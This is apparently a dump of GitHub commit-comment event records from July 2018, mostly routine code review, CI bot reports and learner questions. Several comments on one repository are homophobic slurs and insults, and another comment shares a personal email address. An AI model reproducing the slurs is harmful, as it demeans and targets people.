{"id":"8029590895","type":"CommitCommentEvent","actor":{"login":"tavi-cacina"},"repo":{"name":"sbj42/vcpkg"},"payload":{"comment":{"id":29860883,"position":102,"line":170,"path":"ports/icu/portfile.cmake","commit_id":"723e9231409e65f44853855259711cc6e4b590ca","created_at":"2018-07-27T16:31:55Z","updated_at":"2018-07-27T16:31:55Z","author_association":"NONE","body":"Not Linux-related, but you may want to integrate it anyway: starting with cmake 3.11 the FindICU.cmake does consider the s prefix when searching for static libraries. It is actually hardcoded, so you find_package(ICU) will fail with newer CMake versions. You may want to change this line to:\r\nelseif(${CMAKE_VERSION} VERSION_LESS \"3.11.0\")"}},"created_at":"2018-07-27T16:31:55Z"}
{"id":"8029598021","type":"CommitCommentEvent","actor":{"login":"maelle"},"repo":{"name":"mstrimas/roweb2"},"payload":{"comment":{"id":29860895,"position":null,"line":null,"path":null,"commit_id":"b4bb9a0c60ca53e76867af54b2962c2475eb2688","created_at":"2018-07-27T16:33:29Z","updated_at":"2018-07-27T16:33:29Z","author_association":"NONE","body":"Btw I have gotten access to the EBD 🎉 and I have requested a custom download for Germany, we shall see whether/when I get it."}},"created_at":"2018-07-27T16:33:29Z"}
{"id":"8029598504","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29860896,"position":null,"line":null,"path":null,"commit_id":"3bb8f82e193dc9b3530b534f2336a4c744ebfe0f","created_at":"2018-07-27T16:33:36Z","updated_at":"2018-07-27T16:33:36Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/102/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/102//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3bb8f82e193dc9b3530b534f2336a4c744ebfe0f/102/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3bb8f82e193dc9b3530b534f2336a4c744ebfe0f/102/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3bb8f82e193dc9b3530b534f2336a4c744ebfe0f/102/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/3bb8f82e193dc9b3530b534f2336a4c744ebfe0f/102/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-27T16:33:36Z"}
{"id":"8029598584","type":"CommitCommentEvent","actor":{"login":"belph"},"repo":{"name":"belph/rosette-api-java"},"payload":{"comment":{"id":29860897,"position":null,"line":null,"path":null,"commit_id":"2ba9dc1033530bdd2fbb60980a5f63e21d785eb1","created_at":"2018-07-27T16:33:37Z","updated_at":"2018-07-27T16:33:37Z","author_association":"OWNER","body":"Yeah, a `Map` was my first inclination as well, but I opted for this structure to mirror `MorphologyResponse`"}},"created_at":"2018-07-27T16:33:37Z"}
{"id":"8029600582","type":"CommitCommentEvent","actor":{"login":"vak2ve"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29860900,"position":null,"line":null,"path":null,"commit_id":"18d0e5e133e9a99fac4b532a9cd3aaf66752a526","created_at":"2018-07-27T16:34:05Z","updated_at":"2018-07-27T16:34:05Z","author_association":"CONTRIBUTOR","body":"@WaxCylinderRevival the vast majority of my additions in openers have center-aligned datelines, so if the datelines are right-aligned and in openers then yes, the volumes were received that way with the dates already encoded (including that strange pattern where the received-month and written-date were combined to give the date value). I'll make sure to move the received-date outside the date tag from now on--and I'd be happy to do so in the other Q3 volumes as well!\r\n\r\n"}},"created_at":"2018-07-27T16:34:05Z"}
{"id":"8029601274","type":"CommitCommentEvent","actor":{"login":"aecorredor"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29860901,"position":null,"line":null,"path":null,"commit_id":"076b1cea3563cae30e11d63cc100ceaed9082692","created_at":"2018-07-27T16:34:13Z","updated_at":"2018-07-27T16:34:13Z","author_association":"NONE","body":"@patrickkempff thanks for the quick answer. Sorry about that, got here from the `Pending PR` link on the issue and didn't realize this was already released."}},"created_at":"2018-07-27T16:34:13Z"}
{"id":"8029601637","type":"CommitCommentEvent","actor":{"login":"psukys"},"repo":{"name":"nukeop/smash"},"payload":{"comment":{"id":29860904,"position":null,"line":null,"path":null,"commit_id":"29151553ccdfd97b51f614d1597c9d76a09d8a60","created_at":"2018-07-27T16:34:18Z","updated_at":"2018-07-27T16:34:18Z","author_association":"NONE","body":"I'm a bit puzzled with the line-endings thing. I believe currently LF is being used (which was intended with last commit to master), correct?"}},"created_at":"2018-07-27T16:34:18Z"}
{"id":"8029605958","type":"CommitCommentEvent","actor":{"login":"Military-Doctor"},"repo":{"name":"Military-Doctor/QieGaoWorld"},"payload":{"comment":{"id":29860915,"position":21,"line":63,"path":"QieGaoWorld/views/login.py","commit_id":"566b645ff942c0721fe1549f44a5c06bbb16ff32","created_at":"2018-07-27T16:35:17Z","updated_at":"2018-07-27T16:35:17Z","author_association":"OWNER","body":"你自己看看你后面写的。算了，不跟你计较 你看看这是谁的commit"}},"created_at":"2018-07-27T16:35:17Z"}
{"id":"8029610626","type":"CommitCommentEvent","actor":{"login":"devshgraphicsprogramming"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29860925,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T16:36:21Z","updated_at":"2018-07-27T16:36:21Z","author_association":"NONE","body":"the capturing of the lambda turns it into an std::functional (if I remember correctly some compiler handle this by making a random anonymous class capturing the stuff into its members that also has a () operator)\r\n\r\nI would not want to pass an std::functional every time I `removeByKey`, in the most extreme case I could accept an std::functional in the constructor."}},"created_at":"2018-07-27T16:36:21Z"}
{"id":"8029619102","type":"CommitCommentEvent","actor":{"login":"JoshuaMelo"},"repo":{"name":"JoshuaMelo/Powershell-Scripts"},"payload":{"comment":{"id":29860940,"position":null,"line":null,"path":null,"commit_id":"0bbf6e691cd91a110e51753002e8649e3f83dfbc","created_at":"2018-07-27T16:38:16Z","updated_at":"2018-07-27T16:38:16Z","author_association":"OWNER","body":"Include servers.txt file in the same directory as the script. Do not include spaces after each PC name.\r\n\r\nScript has not been programmed to check for RPC service not running yet."}},"created_at":"2018-07-27T16:38:16Z"}
{"id":"8029619355","type":"CommitCommentEvent","actor":{"login":"MartB"},"repo":{"name":"nextcloud/server"},"payload":{"comment":{"id":29860942,"position":null,"line":null,"path":null,"commit_id":"57ba18f47f18886f3ea31df5eca399e83609e4b6","created_at":"2018-07-27T16:38:20Z","updated_at":"2018-07-27T16:38:20Z","author_association":"NONE","body":"rel: #10430\r\nHey @rullzer can you provide the actual implementation of isDirectoryHandle?"}},"created_at":"2018-07-27T16:38:20Z"}
{"id":"8029631331","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860964,"position":42,"line":32,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:40:55Z","updated_at":"2018-07-27T16:40:55Z","author_association":"OWNER","body":"ну написано же:\".. возвращать список..\" Список понимается, как построчный перечень. А как сделать? чтобы не puts,  а список выводился? \r\nИ второй вопрос - а куда еще мы тут выводим? как не в консоль? мы же в ней все проверяем !"}},"created_at":"2018-07-27T16:40:55Z"}
{"id":"8029632986","type":"CommitCommentEvent","actor":{"login":"sjcallender"},"repo":{"name":"FosterCommerce/CommerceRegisterOnCheckout"},"payload":{"comment":{"id":29860969,"position":null,"line":null,"path":null,"commit_id":"3e3470f23e006ce3f35a3bc9408ef4f19028a9c6","created_at":"2018-07-27T16:41:17Z","updated_at":"2018-07-27T16:41:17Z","author_association":"NONE","body":"Thanks for sharing. We'll keep out of the plugin store and just let you do that when you're ready. If someone finds our fork before then, we'll handle those issues. For the code, you'll notice we took out the need for AJAX requests."}},"created_at":"2018-07-27T16:41:17Z"}
{"id":"8029642283","type":"CommitCommentEvent","actor":{"login":"kanzelm3"},"repo":{"name":"facebook/create-react-app"},"payload":{"comment":{"id":29860981,"position":null,"line":null,"path":null,"commit_id":"d0afe4b3b99b1b0b6ea5b72ccc50a6066c15aac0","created_at":"2018-07-27T16:43:19Z","updated_at":"2018-07-27T16:43:19Z","author_association":"NONE","body":"I am experiencing this issue on 2.0.0-next.3e165448 with `yarn build` on circleci as well. We have a fairly large app, so maybe it has something to do with the size of the project?"}},"created_at":"2018-07-27T16:43:19Z"}
{"id":"8029648244","type":"CommitCommentEvent","actor":{"login":"mstrimas"},"repo":{"name":"mstrimas/roweb2"},"payload":{"comment":{"id":29860993,"position":null,"line":null,"path":null,"commit_id":"b4bb9a0c60ca53e76867af54b2962c2475eb2688","created_at":"2018-07-27T16:44:39Z","updated_at":"2018-07-27T16:44:39Z","author_association":"OWNER","body":"Awesome! Custom download can be highly variable for no apparent reason, usually they take a few minutes, last one I submit took 2 days ¯\\_(ツ)_/¯ Have fun with the data and hit me up if you have any questions: mes335@cornell.edu"}},"created_at":"2018-07-27T16:44:39Z"}
{"id":"8029648720","type":"CommitCommentEvent","actor":{"login":"DmitriKudriashov"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29860994,"position":50,"line":38,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T16:44:45Z","updated_at":"2018-07-27T16:44:45Z","author_association":"OWNER","body":"хеш мне понравился, тем, что там есть ключ. \r\nА как с массивом учесть и номер поезда и его тип одновременно . пока не знаю.\r\nразве, что в массиве элементами тоже будут массивы  .. но тогда от хеша мало чем будет отличаться"}},"created_at":"2018-07-27T16:44:45Z"}
{"id":"8029650192","type":"CommitCommentEvent","actor":{"login":"MCdirtyjob"},"repo":{"name":"MCdirtyjob/cts-course-dj-Week-5"},"payload":{"comment":{"id":29860998,"position":null,"line":null,"path":null,"commit_id":"a40943b6ff408afcb5439971db84724eb0fbf1a2","created_at":"2018-07-27T16:45:06Z","updated_at":"2018-07-27T16:45:06Z","author_association":"OWNER","body":"Not super sure what was wrong with mine but I think on line 8 in main.scss I messed something up and so it's fixed in the new version on line 9 in main.scss."}},"created_at":"2018-07-27T16:45:06Z"}
{"id":"8029657051","type":"CommitCommentEvent","actor":{"login":"Crisspl"},"repo":{"name":"Crisspl/IrrlichtBAW"},"payload":{"comment":{"id":29861011,"position":null,"line":null,"path":null,"commit_id":"529a5b76ccf440d13e09bc12d2b7abbb9c30d851","created_at":"2018-07-27T16:46:37Z","updated_at":"2018-07-27T16:46:37Z","author_association":"OWNER","body":"Lambdas turn into some anonymous types (and putting captures into members, yes).   \r\nAnd so if lambda captures by reference, then passing lambda nothing more than copying a pointer (or a few if there's more in capture list)\r\n"}},"created_at":"2018-07-27T16:46:37Z"}
{"id":"8029658048","type":"CommitCommentEvent","actor":{"login":"doomrobo"},"repo":{"name":"cpeikert/Lol"},"payload":{"comment":{"id":29861012,"position":5,"line":16,"path":"lol-cpp/Crypto/Lol/Cyclotomic/Tensor/CPP/g.cpp","commit_id":"197a4c788237844f21186af8dc2f6c6d4d0d7fe0","created_at":"2018-07-27T16:46:50Z","updated_at":"2018-07-27T16:46:50Z","author_association":"COLLABORATOR","body":"Isn't `+` conventionally only used when there's commutativity?"}},"created_at":"2018-07-27T16:46:50Z"}
{"id":"8029659716","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29861014,"position":null,"line":null,"path":null,"commit_id":"17d66857815c2367368f3d01e6ef6f3a94269063","created_at":"2018-07-27T16:47:12Z","updated_at":"2018-07-27T16:47:12Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Design and Build Endpoints](https://trello.com/c/MhMK13Aa/2-design-and-build-endpoints)"}},"created_at":"2018-07-27T16:47:12Z"}
{"id":"8029662167","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"fidals/stroyprombeton"},"payload":{"comment":{"id":29861018,"position":null,"line":null,"path":null,"commit_id":"5582f5f35cf760cce3d5148affb35cb069d24324","created_at":"2018-07-27T16:47:46Z","updated_at":"2018-07-27T16:47:46Z","author_association":"COLLABORATOR","body":"Puzzle `269-cd112c07` discovered in   [`front/js/shared/services/tracking.es6`](  https://github.com/fidals/stroyprombeton/blob/master/front/js/shared/services/tracking.es6)   and submitted as #273. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-27T16:47:46Z"}
{"id":"8029666383","type":"CommitCommentEvent","actor":{"login":"mateonavia"},"repo":{"name":"Delta2591/Prueba_01"},"payload":{"comment":{"id":29861032,"position":4,"line":4,"path":"Proyecto_01/.project","commit_id":"ac13ff5d52da3d021d8d04067ce2b0e2004dbfe7","created_at":"2018-07-27T16:48:40Z","updated_at":"2018-07-27T16:48:40Z","author_association":"NONE","body":"//faggot"}},"created_at":"2018-07-27T16:48:40Z"}
{"id":"8029670301","type":"CommitCommentEvent","actor":{"login":"MNK-S"},"repo":{"name":"MNK-S/first-test"},"payload":{"comment":{"id":29861044,"position":2,"line":2,"path":"TEST.txt","commit_id":"58b6e43eb50ee5e9649dd23325c8f88ed3aa3734","created_at":"2018-07-27T16:49:32Z","updated_at":"2018-07-27T16:49:32Z","author_association":"OWNER","body":"emmm\r\n"}},"created_at":"2018-07-27T16:49:32Z"}
{"id":"8029671105","type":"CommitCommentEvent","actor":{"login":"MNK-S"},"repo":{"name":"MNK-S/first-test"},"payload":{"comment":{"id":29861045,"position":2,"line":2,"path":"TEST.txt","commit_id":"58b6e43eb50ee5e9649dd23325c8f88ed3aa3734","created_at":"2018-07-27T16:49:42Z","updated_at":"2018-07-27T16:49:42Z","author_association":"OWNER","body":"???"}},"created_at":"2018-07-27T16:49:42Z"}
{"id":"8029672145","type":"CommitCommentEvent","actor":{"login":"mateonavia"},"repo":{"name":"Delta2591/Prueba_01"},"payload":{"comment":{"id":29861047,"position":null,"line":null,"path":null,"commit_id":"ac13ff5d52da3d021d8d04067ce2b0e2004dbfe7","created_at":"2018-07-27T16:49:55Z","updated_at":"2018-07-27T16:49:55Z","author_association":"NONE","body":"hello asshole"}},"created_at":"2018-07-27T16:49:55Z"}
{"id":"8029674308","type":"CommitCommentEvent","actor":{"login":"cpeikert"},"repo":{"name":"cpeikert/Lol"},"payload":{"comment":{"id":29861057,"position":5,"line":16,"path":"lol-cpp/Crypto/Lol/Cyclotomic/Tensor/CPP/g.cpp","commit_id":"197a4c788237844f21186af8dc2f6c6d4d0d7fe0","created_at":"2018-07-27T16:50:25Z","updated_at":"2018-07-27T16:50:25Z","author_association":"OWNER","body":"Hmm, that may be the convention. It looks like non-commutative groups typically use \"multiplication\" for the group operations."}},"created_at":"2018-07-27T16:50:25Z"}
{"id":"8029678679","type":"CommitCommentEvent","actor":{"login":"Delta2591"},"repo":{"name":"Delta2591/Prueba_01"},"payload":{"comment":{"id":29861069,"position":null,"line":null,"path":null,"commit_id":"ac13ff5d52da3d021d8d04067ce2b0e2004dbfe7","created_at":"2018-07-27T16:51:23Z","updated_at":"2018-07-27T16:51:23Z","author_association":"OWNER","body":"hi faggot traslate"}},"created_at":"2018-07-27T16:51:23Z"}
{"id":"8029681737","type":"CommitCommentEvent","actor":{"login":"WaxCylinderRevival"},"repo":{"name":"HistoryAtState/frus"},"payload":{"comment":{"id":29861075,"position":null,"line":null,"path":null,"commit_id":"18d0e5e133e9a99fac4b532a9cd3aaf66752a526","created_at":"2018-07-27T16:52:03Z","updated_at":"2018-07-27T16:52:03Z","author_association":"MEMBER","body":"@vak2ve, awesome tip to use `@rendition` as clue! \r\n\r\nI ran a search from frus1870 to frus1900 and found 477 `date` including \"[Rr]eceived\"\r\n\r\n- frus1870 (144 items)\r\n- frus1871 (310 items)\r\n- frus1872p2v5 (17 items)\r\n- frus1873p1v1 (2 items)\r\n- frus1875v02 (2 items)\r\n- frus1894app2 (1 item)\r\n- frus1898 (1 item)\r\n\r\nAcross the entire FRUS corpus, the search only returns 504 items in >500 volumes (inclusive of those referenced above) so this phenomenon seems very recently introduced.  I'll tag in @joewiz to see if we need to adjust our encoding directions for digitization/keying stage.\r\n\r\nGreat catch, eagle-eyed @vak2ve!"}},"created_at":"2018-07-27T16:52:03Z"}
{"id":"8029682044","type":"CommitCommentEvent","actor":{"login":"CristianRamirez11"},"repo":{"name":"CristianRamirez11/Sistema-De-Computo"},"payload":{"comment":{"id":29861076,"position":null,"line":null,"path":null,"commit_id":"a2556662b294a4d0e11ad5fe964a8805335c1b59","created_at":"2018-07-27T16:52:07Z","updated_at":"2018-07-27T16:52:07Z","author_association":"OWNER","body":"Sistema de computo, para le gestión de los computadores de las diferentes empresas que se tiene convenio, ademas es de codigo libre, se puede descargar y modificar. pero no olvides compartir "}},"created_at":"2018-07-27T16:52:07Z"}
{"id":"8029687709","type":"CommitCommentEvent","actor":{"login":"twinaphex"},"repo":{"name":"TheOtherGuys-Hakchi-Projects/RetroArch"},"payload":{"comment":{"id":29861079,"position":null,"line":null,"path":null,"commit_id":"d847ebc0d427e4d32ee5ab6609484853d0389171","created_at":"2018-07-27T16:53:21Z","updated_at":"2018-07-27T16:53:21Z","author_association":"NONE","body":"Might have to return to this later and see if these autoconfigs can go to the autoconfig repo."}},"created_at":"2018-07-27T16:53:21Z"}
{"id":"8029687720","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29861080,"position":106,"line":358,"path":"assembl/graphql/user.py","commit_id":"cf6f4ceeee9da2b02d059192356cbcda7d548ea1","created_at":"2018-07-27T16:53:21Z","updated_at":"2018-07-27T16:53:21Z","author_association":"CONTRIBUTOR","body":"Yes. The no_autoflush like its name say won't do the flush. Generally no_autoflush is needed to avoid foreign key error on not nullable field when using relations. But you still need db.flush() at the end of the mutation."}},"created_at":"2018-07-27T16:53:21Z"}
{"id":"8029690273","type":"CommitCommentEvent","actor":{"login":"ulf1"},"repo":{"name":"ulf1/oxyba"},"payload":{"comment":{"id":29861086,"position":null,"line":null,"path":null,"commit_id":"2b15815fde980506d12564ae421c2bbf9e6b3bf2","created_at":"2018-07-27T16:53:57Z","updated_at":"2018-07-27T16:53:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [clean_string_to_decimal](https://trello.com/c/byNHG0xC/47-cleanstringtodecimal)"}},"created_at":"2018-07-27T16:53:57Z"}
{"id":"8029691695","type":"CommitCommentEvent","actor":{"login":"lorenarey"},"repo":{"name":"lorenarey/lim-2018-05-bc-core-am-socialnetwork"},"payload":{"comment":{"id":29861092,"position":null,"line":null,"path":null,"commit_id":"084ec952cabf41656a51cce31f7c6f59b3403950","created_at":"2018-07-27T16:54:17Z","updated_at":"2018-07-27T16:54:17Z","author_association":"OWNER","body":"ok"}},"created_at":"2018-07-27T16:54:17Z"}
{"id":"8029696364","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"adeynes/cucumber"},"payload":{"comment":{"id":29861103,"position":null,"line":null,"path":null,"commit_id":"28bf39825c50ab8dbb8117557e28427591deca9c","created_at":"2018-07-27T16:55:19Z","updated_at":"2018-07-27T16:55:19Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nError parsing .poggit.yml: Level 0: yaml_parse(): parsing error encountered\nduring parsing: did not find expected '-' indicator (line 8, column 7),\ncontext while parsing a block collection (line 7, column 7) in\n/poggit/src/poggit/webhook/PushHandler.php#75\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/adeynes/cucumber/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `d6b703da-91bd-11e8-91ef-1aab94b5ce2d`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-27T16:55:19Z"}
{"id":"8029700227","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29861110,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T16:56:04Z","updated_at":"2018-07-27T16:56:04Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-27T16:56:04Z"}
{"id":"8029703459","type":"CommitCommentEvent","actor":{"login":"arandomic"},"repo":{"name":"F0xxie/projectX"},"payload":{"comment":{"id":29861118,"position":14,"line":13,"path":"src/main/java/commands/Show.java","commit_id":"c46dbfb47a9390fbe00509da1d9bf24bbf96089b","created_at":"2018-07-27T16:56:45Z","updated_at":"2018-07-27T16:56:45Z","author_association":"CONTRIBUTOR","body":"Можешь придумать, как избавиться от этого большого количества if-ов по количеству различных сущностей?"}},"created_at":"2018-07-27T16:56:45Z"}
{"id":"8029706517","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29861121,"position":null,"line":null,"path":null,"commit_id":"66b8644197b6fea0f1a4b6f994f14815aa7aeba2","created_at":"2018-07-27T16:57:25Z","updated_at":"2018-07-27T16:57:25Z","author_association":"NONE","body":"#6712-Zone-Coil-Autosizing-does-not-include-impact-of-AirTerminalSingleDuctMixer (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-66b8644197b6fea0f1a4b6f994f14815aa7aeba2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-27T16:57:25Z"}
{"id":"8029707315","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge-Node-Express"},"payload":{"comment":{"id":29861124,"position":null,"line":null,"path":null,"commit_id":"95f28cea706096a95a578d2871c36831381e3f61","created_at":"2018-07-27T16:57:36Z","updated_at":"2018-07-27T16:57:36Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Design and Build Endpoints](https://trello.com/c/MhMK13Aa/2-design-and-build-endpoints)"}},"created_at":"2018-07-27T16:57:36Z"}
{"id":"8029708710","type":"CommitCommentEvent","actor":{"login":"camiluc-peli"},"repo":{"name":"camiluc-peli/RandomProblems"},"payload":{"comment":{"id":29861129,"position":null,"line":null,"path":null,"commit_id":"3992b47f60998b26893d9b45f8b75780d75e3071","created_at":"2018-07-27T16:57:55Z","updated_at":"2018-07-27T16:57:55Z","author_association":"OWNER","body":"Gracias @Nemeq por ponerme este ejercicio 😀 "}},"created_at":"2018-07-27T16:57:55Z"}
{"id":"8029711716","type":"CommitCommentEvent","actor":{"login":"maelle"},"repo":{"name":"mstrimas/roweb2"},"payload":{"comment":{"id":29861136,"position":null,"line":null,"path":null,"commit_id":"b4bb9a0c60ca53e76867af54b2962c2475eb2688","created_at":"2018-07-27T16:58:32Z","updated_at":"2018-07-27T16:58:32Z","author_association":"NONE","body":"Well I will be on vacation next week so fine if it takes a few days 😀 thanks!"}},"created_at":"2018-07-27T16:58:32Z"}
{"id":"8029712250","type":"CommitCommentEvent","actor":{"login":"Caydan"},"repo":{"name":"AshamaneProject/AshamaneCore"},"payload":{"comment":{"id":29861138,"position":null,"line":null,"path":null,"commit_id":"9130db9aef274a24719807e37fbac8396b8303cd","created_at":"2018-07-27T16:58:39Z","updated_at":"2018-07-27T16:58:39Z","author_association":"NONE","body":"Hi @AussieGlenn, it has been a long time. I'd like to get credits for the code I wrote which you are commiting (the elwynn forest or westfall stuff). Btw Traesh also has the latest version of the core we've developed together."}},"created_at":"2018-07-27T16:58:39Z"}
{"id":"8029716158","type":"CommitCommentEvent","actor":{"login":"janos"},"repo":{"name":"ethereum/go-ethereum"},"payload":{"comment":{"id":29861148,"position":32,"line":329,"path":"swarm/network/stream/intervals_test.go","commit_id":"5260ac931deb8fda7e25e0944f9fc18a4c6068fe","created_at":"2018-07-27T16:59:30Z","updated_at":"2018-07-27T16:59:30Z","author_association":"CONTRIBUTOR","body":"NeedData function should return nil, the anonymous function does not have a return value. "}},"created_at":"2018-07-27T16:59:30Z"}
{"id":"8029719317","type":"CommitCommentEvent","actor":{"login":"doomrobo"},"repo":{"name":"cpeikert/Lol"},"payload":{"comment":{"id":29861161,"position":5,"line":16,"path":"lol-cpp/Crypto/Lol/Cyclotomic/Tensor/CPP/g.cpp","commit_id":"197a4c788237844f21186af8dc2f6c6d4d0d7fe0","created_at":"2018-07-27T17:00:13Z","updated_at":"2018-07-27T17:00:13Z","author_association":"COLLABORATOR","body":"Actually, even more to the point, some of these algorithms rely on commutativity to be linear time. Consider the use of `acc` in `gInv`, for example.\n\n> Am 27.07.2018 um 12:50 schrieb Chris Peikert <notifications@github.com>:\n> \n> Hmm, that may be the convention. It looks like non-commutative groups typically use \"multiplication\" for the group operations.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-27T17:00:13Z"}
{"id":"8029724229","type":"CommitCommentEvent","actor":{"login":"illfated"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29861171,"position":null,"line":null,"path":null,"commit_id":"15a13650a496d29782d62c6b6bc13839ce7dc2f9","created_at":"2018-07-27T17:01:09Z","updated_at":"2018-07-27T17:01:09Z","author_association":"NONE","body":"Thank you for this commit, will be interesting to see the changes in action.\r\nI have started a new alliance character and will go there soonish. 🕺"}},"created_at":"2018-07-27T17:01:09Z"}
{"id":"8029733077","type":"CommitCommentEvent","actor":{"login":"Nigusse"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29861187,"position":null,"line":null,"path":null,"commit_id":"59ea6ca48c7ba5202ee14daa752709e02e5edbe1","created_at":"2018-07-27T17:03:08Z","updated_at":"2018-07-27T17:03:08Z","author_association":"CONTRIBUTOR","body":"@mjwitte @rraustad @Myoldmopar your thoughts? I have one definition issue that needs to be cleared out before moving forward. \r\n\r\nNow the \"Air System Outdoor Air Minimum Flow Fraction\" (OutAirMinFrac) is defined as the Minimum OA Flow Rate divided by Design Supply Air Flow Rate regardless of how the Minimum OA Flow Rate is determined. And \"Air System Outdoor Air Flow Fraction\" (Actual OA Fraction) is defined as the Actual OA Flow Rate divided by the actual Mixed Air Flow Rate. These two fractions values can be different and should not be compared as if they are based on the same basis and use them to determine the HX bypass status. This fix addresses the mixed use of these fraction that lead to incorrect HX bypass status. But I would like to know if we want to keep the original definition of \"Air System Outdoor Air Minimum Flow Fraction\" as defined above or modify it to be defined as Minimum OA Flow Rate divided by the actual Mixed Air Flow Rate. "}},"created_at":"2018-07-27T17:03:08Z"}
{"id":"8029736370","type":"CommitCommentEvent","actor":{"login":"vibhanshuchaudhary"},"repo":{"name":"vibhanshuchaudhary/HackNightIndia"},"payload":{"comment":{"id":29861190,"position":null,"line":null,"path":null,"commit_id":"ec3ae7a14cfecfeb7eba95e4714b81320b46c803","created_at":"2018-07-27T17:03:52Z","updated_at":"2018-07-27T17:03:52Z","author_association":"OWNER","body":"**Updated**\r\n**Updated changes**\r\n**completely** **done**"}},"created_at":"2018-07-27T17:03:52Z"}
{"id":"8029739176","type":"CommitCommentEvent","actor":{"login":"vibhanshuchaudhary"},"repo":{"name":"vibhanshuchaudhary/HackNightIndia"},"payload":{"comment":{"id":29861195,"position":null,"line":null,"path":null,"commit_id":"ec3ae7a14cfecfeb7eba95e4714b81320b46c803","created_at":"2018-07-27T17:04:30Z","updated_at":"2018-07-27T17:04:30Z","author_association":"OWNER","body":"**hours/days**"}},"created_at":"2018-07-27T17:04:30Z"}
